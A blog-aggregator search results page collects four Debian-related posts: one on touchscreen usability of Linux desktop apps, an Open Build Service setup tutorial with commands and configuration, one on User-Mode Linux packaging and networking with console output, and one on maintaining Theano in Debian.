Search Results: "smp"

17 January 2017

Ritesh Raj Sarraf: Linux Tablet-Mode Usability

In my ongoing quest to get Tablet-Mode working on my Hybrid machine, here's how I've been living with it so far. My intent is to continue using Free Software for both use cases. My wishful thought is to use the same software under both use cases.
  • Browser: On the browser front, things are pretty decent. Chromium has good support for Touchscreen input. Most of the Touchscreen use cases work well with Chromium. On the Firefox side, after a huge delay, finally, Firefox seems to be catching up. Hopefully, with Firefox 51/52, we'll have a much more usable Touchscreen browser.
  • Desktop Shell: One of the reason of migrating to GNOME was its touch support. From what I've explored so far, GNOME is the only desktop shell that has touch support natively done. The feature isn't complete yet, but is fairly well usable.
    • Given that GNOME has touchscreen support native, it is obvious to be using GNOME equivalent of tools for common use cases. Most of these tools inherit the touchscreen capabilities from the underneath GNOME libraries.
    • File Manager: Nautilus has decent support for touch, as a file manager. The only annoying bit is a right-click equivalent. Or in touch input sense, a long-press.
    • Movie Player: There's a decent movie player, based on GNOME libs; GNOME MPV. In my limited use so far, this interface seems to have good support. Other contenders are:
      • SMPlayer is based on Qt libs. So initial expectation would be that Qt based apps would have better Touch support. But I'm yet to see any serious Qt application with Touch input support. Back to SMPlayer, the dev is pragmatic enough to recognize tablet-mode users and as such has provided a so called "Tablet Mode" view for SMPlayer (The tooltip did not get captured in the screenshot).
      • MPV doesn't come with a UI but has basic management with OSD. And in my limited usage, the OSD implementation does seem capable to take touch input.
  • Books / Documents: GNOME Documents/Books is very basic in what it has to offer, to the point that it is not much useful. But since it is based on the same GNOME libraries, it enjoys native touch input support. Calibre, on the other hand, is feature rich. But it is based on (Py)Qt. Touch input is told to work for Windows. For Linux, there's no support yet. The good thing about Calibre is that it has its own UI, which is pretty decent in a Tablet-Mode Touch workflow.
  • Photo Management: With compact digital devices commonly available, digital content (Both Photos and Videos) is on the rise. The most obvious names that come to mind are Digikam and Shotwell.
    • Shotwell saw its reincarnation in the recent past. From what I recollect, it does have touch support but was lacking quite a bit in terms of features, as compared to Digikam.
    • Digikam is an impressive tool for digital content management. While Digikam is a KDE project, thankfully it does a great job in keeping its KDE dependencies to a bare minimum. But given that Digikam builds on KDE/Qt libs, I haven't had any much success in getting a good touch input solution for Tablet Mode. To make it barely usable in Table-Mode, one could choose a theme preference with bigger toolbars, labels and scrollbars. This helps in making a touch input workaround use case. As you can see, I've configured the Digikam UI with Text alongside Icons for easy touch input.
  • Email: The most common use case. With Gmail and friends, many believe standalone email clients are no more a need. But there always are users like us who prefer emails offline, encrypted emails and prefer theis own email domains. Many of these are still doable with free services like Gmail, but still.
    • Thunderbird shows its age at times. And given the state of Firefox in getting touch support (and GTK3 port), I see nothing happening with TB.
    • KMail was something I discontinued while still being on KDE. The debacle that KDEPIM was, is something I'd always avoid, in the future. Complete waste of time/resource in building, testing, reporting and follow-ups.
    • Geary is another email client that recently saw its reincarnation. I recently had explored Geary. It enjoys similar benefits like the rest applications using GNOME libraries. There was one touch input bug I found, but otherwise Geary's featureset was limited in comparison to Evolution.
    • Migration to Evolution, when migrating to GNOME, was not easy. GNOME's philosophy is to keep things simple and limited. In doing that, they restrict possible flexibilities that users may find obvious. This design philosophy is easily visible across all applications of the GNOME family. Evolution is no different. Hence, coming from TB to E was a small unlearning + newLearning curve. And since Evolution is using the same GNOME libraries, it enjoys similar benefits. Touch input support in Evolution is fairly good. The missing bit is the new Toolbar and Menu structure that many have noticed in the newer GNOME applications (Photos, Documents, Nautilus etc). If only Evolution (and the GNOME family) had the option of customization beyond the developer/project's view, there wouldn't be any wishful thoughts.
      • Above is a screenshot of 2 windows of Evoluiton. In its current form too, Evolution is a gem at times. For my RSS feeds, they are stored in a VFolder in Evolution, so that I can read them when offline. RSS feeds are something I read up in Tablet-mode. On the right is an Evolution window with larger fonts, while on the left, Evoltuion still retains its default font size. This current behavior helps me get Table-Mode Touch working to an extent. In my wishful thoughts, I wish if Evolution provided flexibility to change Toolbar icon sizes. That'd really help easily touch the delete button when in Tablet Mode. A simple button, Tablet Mode, like what SMPlayer has done, would keep users sticky with Evolution.
My wishful thought is that people write (free) software, thinking more about usability across toolkits and desktop environments. Otherwise, the year of the Linux desktop, laptop, tablet; in my opinion, is yet to come. And please don't rip apart tools, in porting them to newer versions of the toolkits. When you rip a tool, you also rip all its QA, Bug Reporting and Testing, that was done over the years. Here's an example of a tool (Goldendict), so well written. Written in Qt, Running under GNOME, and serving over the Chromium interface. In this whole exercise of getting a hybrid working setup, I also came to realize that there does not seem to be a standardized interface, yet, to determine the current operating mode of a running hybrid machine. From what we explored so far, every product has its own way to doing it. Most hybrids come pre-installed and supported with Windows only. So, their mode detection logic seems to be proprietary too. In case anyone is awaer of a standard interface, please drop a note in the comments.




20 October 2016

H ctor Or n Mart nez: Build a Debian package against Debian 8.0 using Download On Demand (DoD) service

In the previous post Open Build Service software architecture has been overviewed. In the current blog post, a tutorial on setting up a package build with OBS from Debian packages is presented. Steps: Generate a test environment by creating Stretch/SID VM Really, use whatever suits you best, but please create an untrusted test environment for this one. In the current tutorial it assumes $hostname is stretch , which should be stretch or sid suite. Be aware that copy & paste configuration files from current post might lead you into broken characters (i.e. ). Debian Stretch weekly netinst CD Enable experimental repository
# echo "deb experimental main" >> /etc/apt/sources.list.d/experimental.list
# apt-get update
Install and setup OBS server, api, worker and osc CLI packages
# apt-get install obs-server obs-api obs-worker osc
In the install process mysql database is needed, therefore if mysql server is not setup, a password needs to be provided.
When OBS API database obs-api is created, we need to pick a password for it, provide opensuse . The obs-api package will configure apache2 https webserver (creating a dummy certificate for stretch ) to serve OBS webui.
Add stretch and obs aliases to localhost entry in your /etc/hosts file.
Enable worker by setting ENABLED=1 in /etc/default/obsworker
Try to connect to the web UI https://stretch/
Login into OBS webui, default login credentials: Admin/opensuse).
From command line tool, try to list projects in OBS
 $ osc -A https://stretch ls
Accept dummy certificate and provide credentials (defaults: Admin/opensuse)
If the install proceeds as expected follow to the next step. Ensure all OBS services are running
# backend services
obsrun     813  0.0  0.9 104960 20448 ?        Ss   08:33   0:03 /usr/bin/perl -w /usr/lib/obs/server/bs_dodup
obsrun     815  0.0  1.5 157512 31940 ?        Ss   08:33   0:07 /usr/bin/perl -w /usr/lib/obs/server/bs_repserver
obsrun    1295  0.0  1.6 157644 32960 ?        S    08:34   0:07  \_ /usr/bin/perl -w /usr/lib/obs/server/bs_repserver
obsrun     816  0.0  1.8 167972 38600 ?        Ss   08:33   0:08 /usr/bin/perl -w /usr/lib/obs/server/bs_srcserver
obsrun    1296  0.0  1.8 168100 38864 ?        S    08:34   0:09  \_ /usr/bin/perl -w /usr/lib/obs/server/bs_srcserver
memcache   817  0.0  0.6 346964 12872 ?        Ssl  08:33   0:11 /usr/bin/memcached -m 64 -p 11211 -u memcache -l
obsrun     818  0.1  0.5  78548 11884 ?        Ss   08:33   0:41 /usr/bin/perl -w /usr/lib/obs/server/bs_dispatch
obsserv+   819  0.0  0.3  77516  7196 ?        Ss   08:33   0:05 /usr/bin/perl -w /usr/lib/obs/server/bs_service
mysql      851  0.0  0.0   4284  1324 ?        Ss   08:33   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     1239  0.2  6.3 1010744 130104 ?      Sl   08:33   1:31  \_ /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/ --socket=/var/run/mysqld/mysqld.sock --port=3306
# web services
root      1452  0.0  0.1 110020  3968 ?        Ss   08:34   0:01 /usr/sbin/apache2 -k start
root      1454  0.0  0.1 435992  3496 ?        Ssl  08:34   0:00  \_ Passenger watchdog
root      1460  0.3  0.2 651044  5188 ?        Sl   08:34   1:46      \_ Passenger core
nobody    1465  0.0  0.1 444572  3312 ?        Sl   08:34   0:00      \_ Passenger ust-router
www-data  1476  0.0  0.1 855892  2608 ?        Sl   08:34   0:09  \_ /usr/sbin/apache2 -k start
www-data  1477  0.0  0.1 856068  2880 ?        Sl   08:34   0:09  \_ /usr/sbin/apache2 -k start
www-data  1761  0.0  4.9 426868 102040 ?       Sl   08:34   0:29 delayed_job.0
www-data  1767  0.0  4.8 425624 99888 ?        Sl   08:34   0:30 delayed_job.1
www-data  1775  0.0  4.9 426516 101708 ?       Sl   08:34   0:28 delayed_job.2
nobody    1788  0.0  5.7 496092 117480 ?       Sl   08:34   0:03 Passenger RubyApp: /usr/share/obs/api
nobody    1796  0.0  4.9 488888 102176 ?       Sl   08:34   0:00 Passenger RubyApp: /usr/share/obs/api
www-data  1814  0.0  4.5 282576 92376 ?        Sl   08:34   0:22 delayed_job.1000
www-data  1829  0.0  4.4 282684 92228 ?        Sl   08:34   0:22 delayed_job.1010
www-data  1841  0.0  4.5 282932 92536 ?        Sl   08:34   0:22 delayed_job.1020
www-data  1855  0.0  4.9 427988 101492 ?       Sl   08:34   0:29 delayed_job.1030
www-data  1865  0.2  5.0 492500 102964 ?       Sl   08:34   1:09 clockworkd.clock
www-data  1899  0.0  0.0  87100  1400 ?        S    08:34   0:00 /usr/bin/searchd --pidfile --config /usr/share/obs/api/config/production.sphinx.conf
www-data  1900  0.1  0.4 161620  8276 ?        Sl   08:34   0:51  \_ /usr/bin/searchd --pidfile --config /usr/share/obs/api/config/production.sphinx.conf
# OBS worker
root      1604  0.0  0.0  28116  1492 ?        Ss   08:34   0:00 SCREEN -m -d -c /srv/obs/run/worker/boot/screenrc
root      1605  0.0  0.9  75424 18764 pts/0    Ss+  08:34   0:06  \_ /usr/bin/perl -w ./bs_worker --hardstatus --root /srv/obs/worker/root_1 --statedir /srv/obs/run/worker/1 --id stretch:1 --reposerver http://obs:5252 --jobs 1
Create an OBS project for Download on Demand (DoD) Create a meta project file:
$ osc -A https://stretch:443 meta prj Debian:8 -e
<project name= Debian:8 >
<title>Debian 8 DoD</title>
<description>Debian 8 DoD</description>
<person userid= Admin role= maintainer />
<repository name= main >
<download arch= x86_64 url= repotype= deb />
Visit webUI to check project configuration Create a meta project configuration file:
$ osc -A https://stretch:443 meta prjconf Debian:8 -e
Add the following file, as found at
Repotype: debian
# create initial user
Preinstall: base-passwd
Preinstall: user-setup
# required for preinstall images
Preinstall: perl
# preinstall essentials + dependencies
Preinstall: base-files base-passwd bash bsdutils coreutils dash debconf
Preinstall: debianutils diffutils dpkg e2fslibs e2fsprogs findutils gawk
Preinstall: gcc-4.9-base grep gzip hostname initscripts insserv libacl1
Preinstall: libattr1 libblkid1 libbz2-1.0 libc-bin libc6 libcomerr2 libdb5.3
Preinstall: libgcc1 liblzma5 libmount1 libncurses5 libpam-modules
Preinstall: libpcre3 libsmartcols1
Preinstall: libpam-modules-bin libpam-runtime libpam0g libreadline6
Preinstall: libselinux1 libsemanage-common libsemanage1 libsepol1 libsigsegv2
Preinstall: libslang2 libss2 libtinfo5 libustr-1.0-1 libuuid1 login lsb-base
Preinstall: mount multiarch-support ncurses-base ncurses-bin passwd perl-base
Preinstall: readline-common sed sensible-utils sysv-rc sysvinit sysvinit-utils
Preinstall: tar tzdata util-linux zlib1g
Runscripts: base-passwd user-setup base-files gawk
VMinstall: libdevmapper1.02.1
Order: user-setup:base-files
# Essential packages (this should also pull the dependencies)
Support: base-files base-passwd bash bsdutils coreutils dash debianutils
Support: diffutils dpkg e2fsprogs findutils grep gzip hostname libc-bin 
Support: login mount ncurses-base ncurses-bin perl-base sed sysvinit 
Support: sysvinit-utils tar util-linux
# Build-essentials
Required: build-essential
Prefer: build-essential:make
# build script needs fakeroot
Support: fakeroot
# lintian support would be nice, but breaks too much atm
#Support: lintian
# helper tools in the chroot
Support: less kmod net-tools procps psmisc strace vim
# everything below same as for Debian:6.0 (apart from the version macros ofc)
# circular dependendencies in openjdk stack
Order: openjdk-6-jre-lib:openjdk-6-jre-headless
Order: openjdk-6-jre-headless:ca-certificates-java
Keep: binutils cpp cracklib file findutils gawk gcc gcc-ada gcc-c++
Keep: gzip libada libstdc++ libunwind
Keep: libunwind-devel libzio make mktemp pam-devel pam-modules
Keep: patch perl rcs timezone
Prefer: cvs libesd0 libfam0 libfam-dev expect
Prefer: gawk locales default-jdk
Prefer: xorg-x11-libs libpng fam mozilla mozilla-nss xorg-x11-Mesa
Prefer: unixODBC libsoup glitz java-1_4_2-sun gnome-panel
Prefer: desktop-data-SuSE gnome2-SuSE mono-nunit gecko-sharp2
Prefer: apache2-prefork openmotif-libs ghostscript-mini gtk-sharp
Prefer: glib-sharp libzypp-zmd-backend mDNSResponder
Prefer: -libgcc-mainline -libstdc++-mainline -gcc-mainline-c++
Prefer: -libgcj-mainline -viewperf -compat -compat-openssl097g
Prefer: -zmd -OpenOffice_org -pam-laus -libgcc-tree-ssa -busybox-links
Prefer: -crossover-office -libgnutls11-dev
# alternative pkg-config implementation
Prefer: -pkgconf
Prefer: -openrc
Prefer: -file-rc
Conflict: ghostscript-library:ghostscript-mini
Ignore: sysvinit:initscripts
Ignore: aaa_base:aaa_skel,suse-release,logrotate,ash,mingetty,distribution-release
Ignore: gettext-devel:libgcj,libstdc++-devel
Ignore: pwdutils:openslp
Ignore: pam-modules:resmgr
Ignore: rpm:suse-build-key,build-key
Ignore: bind-utils:bind-libs
Ignore: alsa:dialog,pciutils
Ignore: portmap:syslogd
Ignore: fontconfig:freetype2
Ignore: fontconfig-devel:freetype2-devel
Ignore: xorg-x11-libs:freetype2
Ignore: xorg-x11:x11-tools,resmgr,xkeyboard-config,xorg-x11-Mesa,libusb,freetype2,libjpeg,libpng
Ignore: apache2:logrotate
Ignore: arts:alsa,audiofile,resmgr,libogg,libvorbis
Ignore: kdelibs3:alsa,arts,pcre,OpenEXR,aspell,cups-libs,mDNSResponder,krb5,libjasper
Ignore: kdelibs3-devel:libvorbis-devel
Ignore: kdebase3:kdebase3-ksysguardd,OpenEXR,dbus-1,dbus-1-qt,hal,powersave,openslp,libusb
Ignore: kdebase3-SuSE:release-notes
Ignore: jack:alsa,libsndfile
Ignore: libxml2-devel:readline-devel
Ignore: gnome-vfs2:gnome-mime-data,desktop-file-utils,cdparanoia,dbus-1,dbus-1-glib,krb5,hal,libsmbclient,fam,file_alteration
Ignore: libgda:file_alteration
Ignore: gnutls:lzo,libopencdk
Ignore: gnutls-devel:lzo-devel,libopencdk-devel
Ignore: pango:cairo,glitz,libpixman,libpng
Ignore: pango-devel:cairo-devel
Ignore: cairo-devel:libpixman-devel
Ignore: libgnomeprint:libgnomecups
Ignore: libgnomeprintui:libgnomecups
Ignore: orbit2:libidl
Ignore: orbit2-devel:libidl,libidl-devel,indent
Ignore: qt3:libmng
Ignore: qt-sql:qt_database_plugin
Ignore: gtk2:libpng,libtiff
Ignore: libgnomecanvas-devel:glib-devel
Ignore: libgnomeui:gnome-icon-theme,shared-mime-info
Ignore: scrollkeeper:docbook_4,sgml-skel
Ignore: gnome-desktop:libgnomesu,startup-notification
Ignore: python-devel:python-tk
Ignore: gnome-pilot:gnome-panel
Ignore: gnome-panel:control-center2
Ignore: gnome-menus:kdebase3
Ignore: gnome-main-menu:rug
Ignore: libbonoboui:gnome-desktop
Ignore: postfix:pcre
Ignore: docbook_4:iso_ent,sgml-skel,xmlcharent
Ignore: control-center2:nautilus,evolution-data-server,gnome-menus,gstreamer-plugins,gstreamer,metacity,mozilla-nspr,mozilla,libxklavier,gnome-desktop,startup-notification
Ignore: docbook-xsl-stylesheets:xmlcharent
Ignore: liby2util-devel:libstdc++-devel,openssl-devel
Ignore: yast2:yast2-ncurses,yast2-theme-SuSELinux,perl-Config-Crontab,yast2-xml,SuSEfirewall2
Ignore: yast2-core:netcat,hwinfo,wireless-tools,sysfsutils
Ignore: yast2-core-devel:libxcrypt-devel,hwinfo-devel,blocxx-devel,sysfsutils,libstdc++-devel
Ignore: yast2-packagemanager-devel:rpm-devel,curl-devel,openssl-devel
Ignore: yast2-devtools:perl-XML-Writer,libxslt,pkgconfig
Ignore: yast2-installation:yast2-update,yast2-mouse,yast2-country,yast2-bootloader,yast2-packager,yast2-network,yast2-online-update,yast2-users,release-notes,autoyast2-installation
Ignore: yast2-bootloader:bootloader-theme
Ignore: yast2-packager:yast2-x11
Ignore: yast2-x11:sax2-libsax-perl
Ignore: openslp-devel:openssl-devel
Ignore: java-1_4_2-sun:xorg-x11-libs
Ignore: java-1_4_2-sun-devel:xorg-x11-libs
Ignore: kernel-um:xorg-x11-libs
Ignore: tetex:xorg-x11-libs,expat,fontconfig,freetype2,libjpeg,libpng,ghostscript-x11,xaw3d,gd,dialog,ed
Ignore: yast2-country:yast2-trans-stats
Ignore: susehelp:susehelp_lang,suse_help_viewer
Ignore: mailx:smtp_daemon
Ignore: cron:smtp_daemon
Ignore: hotplug:syslog
Ignore: pcmcia:syslog
Ignore: avalon-logkit:servlet
Ignore: jython:servlet
Ignore: ispell:ispell_dictionary,ispell_english_dictionary
Ignore: aspell:aspel_dictionary,aspell_dictionary
Ignore: smartlink-softmodem:kernel,kernel-nongpl
Ignore: OpenOffice_org-de:myspell-german-dictionary
Ignore: mediawiki:php-session,php-gettext,php-zlib,php-mysql,mod_php_any
Ignore: squirrelmail:mod_php_any,php-session,php-gettext,php-iconv,php-mbstring,php-openssl
Ignore: simias:mono(log4net)
Ignore: zmd:mono(log4net)
Ignore: horde:mod_php_any,php-gettext,php-mcrypt,php-imap,php-pear-log,php-pear,php-session,php
Ignore: xerces-j2:xml-commons-apis,xml-commons-resolver
Ignore: xdg-menu:desktop-data
Ignore: nessus-libraries:nessus-core
Ignore: evolution:yelp
Ignore: mono-tools:mono(gconf-sharp),mono(glade-sharp),mono(gnome-sharp),mono(gtkhtml-sharp),mono(atk-sharp),mono(gdk-sharp),mono(glib-sharp),mono(gtk-sharp),mono(pango-sharp)
Ignore: gecko-sharp2:mono(glib-sharp),mono(gtk-sharp)
Ignore: gnome-libs:libgnomeui
Ignore: nautilus:gnome-themes
Ignore: gnome-panel:gnome-themes
Ignore: gnome-panel:tomboy
Substitute: utempter
%ifnarch s390 s390x ppc ia64
Substitute: java2-devel-packages java-1_4_2-sun-devel
 %ifnarch s390x
Substitute: java2-devel-packages java-1_4_2-ibm-devel
Substitute: java2-devel-packages java-1_4_2-ibm-devel xorg-x11-libs-32bit
Substitute: yast2-devel-packages docbook-xsl-stylesheets doxygen libxslt perl-XML-Writer popt-devel sgml-skel update-desktop-files yast2 yast2-devtools yast2-packagemanager-devel yast2-perl-bindings yast2-testsuite
# SUSE compat mappings
Substitute: gcc-c++ gcc
Substitute: libsigc++2-devel libsigc++-2.0-dev
Substitute: glibc-devel-32bit
Substitute: pkgconfig pkg-config
%ifarch %ix86
Substitute: kernel-binary-packages kernel-default kernel-smp kernel-bigsmp kernel-debug kernel-um kernel-xen kernel-kdump
%ifarch ia64
Substitute: kernel-binary-packages kernel-default kernel-debug
%ifarch x86_64
Substitute: kernel-binary-packages kernel-default kernel-smp kernel-xen kernel-kdump
%ifarch ppc
Substitute: kernel-binary-packages kernel-default kernel-kdump kernel-ppc64 kernel-iseries64
%ifarch ppc64
Substitute: kernel-binary-packages kernel-ppc64 kernel-iseries64
%ifarch s390
Substitute: kernel-binary-packages kernel-s390
%ifarch s390x
Substitute: kernel-binary-packages kernel-default
%define debian_version 800
%debian_version 800
Visit webUI to check project configuration Create an OBS project linked to DoD
$ osc -A https://stretch:443 meta prj test -e
<project name= test >
<person userid= Admin role= maintainer />
<repository name= Debian_8.0 >
<path project= Debian:8 repository= main />
Visit webUI to check project configuration Adding a package to the project
$ osc -A https://stretch:443 co test ; cd test
$ mkdir hello ; cd hello ; apt-get source -d hello ; cd - ; 
$ osc add hello 
$ osc ci -m "New import" hello
The package should go to dispatched state then get in blocked state while it downloads build dependencies from DoD link, eventually it should start building. Please check the journal logs to check if something went wrong or gets stuck. Visit webUI to check hello package build state OBS logging to the journal Check in the journal logs everything went fine:
$ sudo journalctl -u obsdispatcher.service -u obsdodup.service -u obsscheduler@x86_64.service -u obsworker.service -u obspublisher.service
Troubleshooting Currently we are facing few issues with web UI: And there are more issues that have not been reported, please do reportbug obs-api .

31 July 2016

Ritesh Raj Sarraf: User Mode Linux

Recently, we had the User-Mode Linux suite out of Debian, which included user-mode-linux, user-mode-linux-doc and uml-utilities package. We are happy that we were able to bring it back into the archvie quick, and hope to maintain it active. For many who may not know about UML, here's a discription from its website:
User-Mode Linux is a safe, secure way of running Linux versions and Linux processes. Run buggy software, experiment with new Linux kernels or distributions, and poke around in the internals of Linux, all without risking your main Linux setup.
User-Mode Linux gives you a virtual machine that may have more hardware and software virtual resources than your actual, physical computer. Disk storage for the virtual machine is entirely contained inside a single file on your physical machine. You can assign your virtual machine only the hardware access you want it to have. With properly limited access, nothing you do on the virtual machine can change or damage your real computer, or its software.
Most of the use cases mentioned here are achievable with Containers today. The big difference UML provides in, is with a separate kernel. UML is an implementation of Linux as an architecture of Linux itself. It supports x86 and x86_64 architecture. And given that it is the port of the kernel, you can do many of the tests and experiments of the regular kernel, safely inside a confined UML environment. As with other virtualization implementations, the limitation comes in if you are working on physical hardware. With its re-entry in Debian, I wanted to revive my local setup. First is the packaging structure and the second is its integration with current standard tools
  • Packaging: For packaging UML in Debian, we rely on the packaged linux-source package provided by the kernel team.
    • linux-source package: We build UML from the linux sources that are provided by the debian kernel team. This works fine for now. Whenever there's a kernel vulnerability, there'll be an updated source package, to which we'll rebuild the UML package.
    • Merge with debian-kernel: In the longer run, we'd like to push UML package into the debian kernel team. UML is a component of the Linux kernel, and that is where it should be built from.
  • Integration: It works fairly well right now. On modern systems with systemd, where (nspawn) containers can easily have a network interface bound to it, UML lacks a bit behind. It'd be nice if we could see some UML integration with systemd.
    • Networking under systemd: Setting up networking, for UML, under systemd is fairly straight. In fact, with systemd, it is much simpler. Below is the host network (tuntap) setup, to which UML can bind for all its network needs.
rrs@learner:~/tidBits (master)$ cat /etc/systemd/network/tap.netdev 
2016-08-01 / 15:41:40       
rrs@learner:~/tidBits (master)$ cat /etc/systemd/network/ 
2016-08-01 / 15:41:43       

systemd allows for defining user/group ownership in its file. With this setup, and uml-utilities running, one can simply fire a UML instance as below:

rrs@learner:~/rrs-home/Community/Packaging/user-mode-linux (master)$ linux ubd0=~/rrs-home/NoTrack/uml.img eth0=daemon mem=1024M rw  
Core dump limits :
    soft - 0
    hard - NONE
Checking that ptrace can change system call numbers...OK
Checking syscall emulation patch for ptrace...OK
Checking advanced syscall emulation patch for ptrace...OK
Checking environment variables for a tempdir...none found
Checking if /dev/shm is on tmpfs...OK
Checking PROT_EXEC mmap in /dev/shm...OK
Adding 23609344 bytes to physical memory to account for exec-shield gap
Linux version 4.6.3 (root@chutzpah) (gcc version 5.4.0 20160609 (Debian 5.4.0-6) ) #2 Sat Jul 16 16:22:22 UTC 2016
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 263721
Kernel command line: ubd0=/home/rrs/rrs-home/NoTrack/uml.img eth0=daemon mem=1024M rw root=98:0
PID hash table entries: 4096 (order: 3, 32768 bytes)
Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes)
Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes)
Memory: 1020852K/1071632K available (4803K kernel code, 1207K rwdata, 1340K rodata, 157K init, 217K bss, 50780K reserved, 0K cma-reserved)
SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
root@uml:~# cat /proc/cpuinfo 
processor    : 0
vendor_id    : User Mode Linux
model name    : UML
mode        : skas
host        : Linux learner 4.6.0-1-amd64 #1 SMP Debian 4.6.4-1 (2016-07-18) x86_64
bogomips    : 6048.97
root@uml:~# ping
PING ( 56(84) bytes of data.
64 bytes from ( icmp_seq=1 ttl=46 time=372 ms
64 bytes from ( icmp_seq=2 ttl=46 time=395 ms
64 bytes from ( icmp_seq=3 ttl=46 time=315 ms
--- ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 315.550/361.064/395.440/33.556 ms

And here are some (incomplete and non-conclusive) performance numbers

root@uml:~# dd if=/dev/zero of=foo.img bs=1M count=2500 conv=fsync
2500+0 records in
2500+0 records out
2621440000 bytes (2.6 GB, 2.4 GiB) copied, 39.4876 s, 66.4 MB/s
rrs@learner:/var/tmp/Debian-Build/Result$ dd if=/dev/zero of=foo.img bs=1M count=2500 conv=fsync
2500+0 records in
2500+0 records out
2621440000 bytes (2.6 GB, 2.4 GiB) copied, 41.2126 s, 63.6 MB/s
2016-08-01 / 15:59:15       




20 July 2016

Daniel Stender: Theano in Debian: maintenance, BLAS and CUDA

I'm glad to announce that we have the current release of Theano (0.8.2) in Debian unstable now, it's on its way into the testing branch and the Debian derivatives, heading for Debian 9. The Debian package is maintained in behalf of the Debian Science Team. We have a binary package with the modules in the Python 2.7 import path (python-theano), if you want or need to stick to that branch a little longer (as a matter of fact, in the current popcon stats it's the most installed package), and a package running on the default Python 3 version (python3-theano). The comprehensive documentation is available for offline usage in another binary package (theano-doc). Although Theano builds its extensions on run time and therefore all binary packages contain the same code, the source package generates arch specific packages1 for the reason that the exhaustive test suite could run over all the architectures to detect if there are problems somewhere (#824116). what's this? In a nutshell, Theano is a computer algebra system (CAS) and expression compiler, which is implemented in Python as a library. It is named after a Classical Greek female mathematician and it's developed at the LISA lab (located at MILA, the Montreal Institute for Learning Algorithms) at the Universit de Montr al. Theano tightly integrates multi-dimensional arrays (N-dimensional, ND-array) from NumPy (numpy.ndarray), which are broadly used in Scientific Python for the representation of numeric data. It features a declarative Python based language with symbolic operations for the functional definition of mathematical expressions, which allows to create functions that compute values for them. Internally the expressions are represented as directed graphs with nodes for variables and operations. The internal compiler then optimizes those graphs for stability and speed and then generates high-performance native machine code to evaluate resp. compute these mathematical expressions2. One of the main features of Theano is that it's capable to compute also on GPU processors (graphical processor unit), like on custom graphic cards (e.g. the developers are using a GeForce GTX Titan X for benchmarks). Today's GPUs became very powerful parallel floating point devices which can be employed also for scientific computations instead of 3D video games3. The acronym "GPGPU" (general purpose graphical processor unit) refers to special cards like NVIDIA's Tesla4, which could be used alike (more on that below). Thus, Theano is a high-performance number cruncher with an own computing engine which could be used for large-scale scientific computations. If you haven't came across Theano as a Pythonistic professional mathematician, it's also one of the most prevalent frameworks for implementing deep learning applications (training multi-layered, "deep" artificial neural networks, DNN) around5, and has been developed with a focus on machine learning from the ground up. There are several higher level user interfaces build in the top of Theano (for DNN, Keras, Lasagne, Blocks, and others, or for Python probalistic programming, PyMC3). I'll seek for some of them also becoming available in Debian, too. helper scripts Both binary packages ship three convenience scripts, theano-cache, theano-test, and theano-nose. Instead of them being copied into /usr/bin, which would result into a binaries-have-conflict violation, the scripts are to be found in /usr/share/python-theano (python3-theano respectively), so that both module packages of Theano can be installed at the same time. The scripts could be run directly from these folders, e.g. do $ python /usr/share/python-theano/theano-nose to achieve that. If you're going to heavy use them, you could add the directory of the flavour you prefer (Python 2 or Python 3) to the $PATH environment variable manually by either typing e.g. $ export PATH=/usr/share/python-theano:$PATH on the prompt, or save that line into ~/.bashrc. Manpages aren't available for these little helper scripts6, but you could always get info on what they do and which arguments they accept by invoking them with the -h (for theano-nose) resp. help flag (for theano-cache). running the tests On some occasions you might want to run the testsuite of the installed library, like to check over if everything runs fine on your GPU hardware. There are two different ways to run the tests (anyway you need to have python ,3 -nose installed). One is, you could launch the test suite by doing $ python -c 'import theano; theano.test() (or the same with python3 to test the other flavour), that's the same what the helper script theano-test does. However, by doing it that way some particular tests might fail by raising errors also for the group of known failures. Known failures are excluded from being errors if you run the tests by theano-nose, which is a wrapper around nosetests, so this might be always the better choice. You can run this convenience script with the option --theano on the installed library, or from the source package root, which you could pull by $ sudo apt-get source theano (there you have also the option to use bin/theano-nose). The script accept options for nosetests, so you might run it with -v to increase verbosity. For the tests the configuration switch config.device must be set to cpu. This will also include the GPU tests when a proper accessible device is detected, so that's a little misleading in the sense of it doesn't mean "run everything on the CPU". You're on the safe side if you run it always like this: $ THEANO_FLAGS=device=cpu theano-nose, if you've set config.device to gpu in your ~/.theanorc. Depending on the available hardware and the used BLAS implementation (see below) it could take quite a long time to run the whole test suite through, on the Core-i5 in my laptop that takes around an hour even excluded the GPU related tests (which perform pretty fast, though). Theano features a couple of switches to manipulate the default configuration for optimization and compilation. There is a rivalry between optimization and compilation costs against performance of the test suite, and it turned out the test suite performs a quicker with lesser graph optimization. There are two different switches available to control config.optimizer, the fast_run toggles maximal optimization, while fast_compile runs only a minimal set of graph optimization features. These settings are used by the general mode switches for config.mode, which is either FAST_RUN by default, or FAST_COMPILE. The default mode FAST_RUN (optimizer=fast_run, linker=cvm) needs around 72 minutes on my lower mid-level machine (on un-optimized BLAS). To set mode=FAST_COMPILE (optimizer=fast_compile, linker=py) brings some boost for the performance of the test suite because it runs the whole suite in 46 minutes. The downside of that is that C code compilation is disabled in this mode by using the linker py, and also the GPU related tests are not included. I've played around with using the optimizer fast_compile with some of the other linkers (c py and cvm, and their versions without garbage collection) as alternative to FAST_COMPILE with minimal optimization but also machine code compilation incl. GPU testing. But to my experience, fast_compile without another than the linker py results in some new errors and failures of some tests on amd64, and this might the case also on other architectures, too. By the way, another useful feature is DebugMode for config.mode, which verifies the correctness of all optimizations and compares the C to Python results. If you want to have detailed info on the configuration settings of Theano, do $ python -c 'import theano; print theano.config' less, and check out the chapter config in the library documentation in the documentation. cache maintenance Theano isn't a JIT (just-in-time) compiler like Numba, which generates native machine code in the memory and executes it immediately, but it saves the generated native machine code into compiledirs. The reason for doing it that way is quite practical like the docs explain, the persistent cache on disk makes it possible to avoid generating code for the same operation, and to avoid compiling again when different operations generate the same code. The compiledirs by default are located within $(HOME)/.theano/. After some time the folder becomes quite large, and might look something like this:
$ ls ~/.theano
